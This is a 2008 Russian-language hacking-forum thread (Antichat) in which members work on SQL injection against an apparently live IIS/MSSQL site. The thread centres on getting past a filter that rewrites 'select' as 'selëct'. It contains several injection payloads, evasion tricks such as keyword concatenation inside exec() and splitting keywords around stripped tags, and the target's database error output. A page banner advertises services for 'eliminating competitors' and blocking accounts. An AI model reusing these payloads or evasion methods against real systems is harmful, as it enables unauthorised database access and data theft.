FORUMS
MEMBERS
RECENT POSTS
LOG IN
Search Forums
Featured Threads Archive
Recent Posts
Notable Members
Registered Members
Current Visitors
Recent Activity
New Profile Posts
×
Авторизация
Имя пользователя:
Пароль:
Запомнить меня
Привязать к IP
Нет аккаунта?
Регистрация
УСТРАНЕНИЕ КОНКУРЕНТОВ.
БЛОКИРОВКА ДОМЕНОВ,
БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ.
ПРОВЕРЕННЫЙ СЕЛЛЕР.
НОВЫЕ
ТОРГОВАЯ
НОВОСТИ
ЧАТ
loading...
Скрыть
ANTICHAT
>
БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ
>
Уязвимости
фильтрация select в mssql
Поиск по форуму
Расширенный поиск
Опции темы
Поиск в этой теме
Опции просмотра
фильтрация select в mssql
#
1
01.07.2008, 15:07
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами:
9436363
Репутация:
55
фильтрация select в mssql
вот впервые столкнулся с такой интересной фильтрацией:
если в теле запроса видит select то переводит его в такой вид:
Код:
selëct db_name()
и соотвественно скуль ругается:
Код:
Line 1: Incorrect syntax near ';'.
т.е. вместо второе е подставляет html значение немецкой ё - ë
попытки закодировать select в %73%65%6C%65%63%74
успеха не принесли
если ли еще какие-то варианты?
𝕏 Twitter
Reddit
Telegram
Копировать ссылку
durito
Посмотреть профиль
Репутация
Отправить личное сообщение для durito
Найти все сообщения от durito
Добавить в друзья
#
2
01.07.2008, 15:15
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами:
9436363
Репутация:
55
там же Iis и винда, а ей пофиг на регистр
durito
Посмотреть профиль
Репутация
Отправить личное сообщение для durito
Найти все сообщения от durito
Добавить в друзья
#
3
02.07.2008, 08:29
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
С нами:
10869277
Репутация:
52
ээээ... Я правильно понял твою проблему?
Код:
;exec ("SELE"+"CT users"+"FROM tables")
Dima-k17
Посмотреть профиль
Репутация
Отправить личное сообщение для Dima-k17
Посетить домашнюю страницу Dima-k17
Найти все сообщения от Dima-k17
Добавить в друзья
#
4
03.07.2008, 10:15
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами:
9436363
Репутация:
55
я вообще не встречал, чтоб такая фича гдето работала
durito
Посмотреть профиль
Репутация
Отправить личное сообщение для durito
Найти все сообщения от durito
Добавить в друзья
#
5
03.07.2008, 14:01
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
С нами:
10254549
Репутация:
227
посоветую поискать какие слова/символы вырезаются. Именно вырезаются. Так, например, если вырезается тег <script>, то запрос нужно желать таким: se<script>lect
o3,14um
Посмотреть профиль
Репутация
Отправить личное сообщение для o3,14um
Найти все сообщения от o3,14um
Добавить в друзья
#
6
04.07.2008, 12:24
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами:
9436363
Репутация:
55
так ведь, дык не вырезается а заменяет на ё
Dima-k17
отвечает:
Цитата:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near 'ect'.
/event_detail.asp, line 44
обрамляем скобками и видим что не нравится:
Цитата:
1 or 1=(["sel"+"ect" db_name()])--
Цитата:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Invalid column name '"sel" "ect" db_name()'.
/event_detail.asp, line 44
т.е. при таком запросе просто отбрасывает sel
если пробовать так:
Цитата:
4696; exec (select db_name())--
то ответ:
Цитата:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near 'ex'.
/event_detail.asp, line 44
подставляем скобки:
Цитата:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near 'exëc (selëct db_name())'.
/event_detail.asp, line 44
durito
Посмотреть профиль
Репутация
Отправить личное сообщение для durito
Найти все сообщения от durito
Добавить в друзья
«
Предыдущая тема
|
Следующая тема
»
Похожие темы
Тема
Автор
Раздел
Ответов
Последнее сообщение
MySQL Injection Cheat Sheet
xcedz
Болталка
3
13.02.2008
03:21
Здесь присутствуют: 1
(пользователей: 0 , гостей: 1)
Опции темы
Версия для печати
Отправить по электронной почте
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой темы
Вы уже оценили эту тему
Быстрый переход
Мой кабинет
Личные сообщения
Подписки
Кто на форуме
Поиск по форуму
Главная страница форума
ИНФО
Мировые новости. Обсуждения.
Статьи
Избранное
РАЗРАБОТКА
Ваши проекты
SЕО - тонкости, методы раскрутки
Услуги, Покупка и Продажа в SEO
Хостинги - Hostings
Хостинг, Dedicated, VDS, Сервера - покупка, продажа
Для Администратора
Apple: Mac, OS X, iOS
AntiDDos - АнтиДДОС
Windows
Linux, Freebsd, *nix
ПРОГРАММИРОВАНИЕ
Общие вопросы программирования
ПО для Web разработчика
PHP
Python
С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Реверсинг
ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ
Покупка, Продажа, Обмен
Разное - Покупка, продажа, обмен
Услуги, Покупка и Продажа в SEO
Электронные валюты: Обмен, Вывод, Ввод
VPN, Proxy, Socks - Покупка, продажа
Хостинг, Dedicated, VDS, Сервера - Покупка, продажа
Мобильная связь, СМС - Покупка, продажа
Трафик, инсталлы, загрузки - Покупка, продажа
Покупка, продажа, услуги в Соц. Сетях
Партнерки
Freelance - О Работе
Предложения работы, услуг
Социальные сети
Покупка, продажа, услуги в Соц. Сетях
Платежные системы
Электронные валюты: Обмен, Вывод, Ввод
Blockchain, Криптовалюты, смарт-контракты
ЛИЧНЫЕ ФОРУМЫ
Olbanec - Арбитраж трафика
ОФФТОП
Болталка
Forum for discussion of ANTICHAT
Video.Antichat
Комментарии к видео
Архив
ICQ - Покупка, продажа
Home
Contact Us
Help
Terms and Rules
Privacy Policy
ANTICHAT ™ © 2001- Antichat Kft.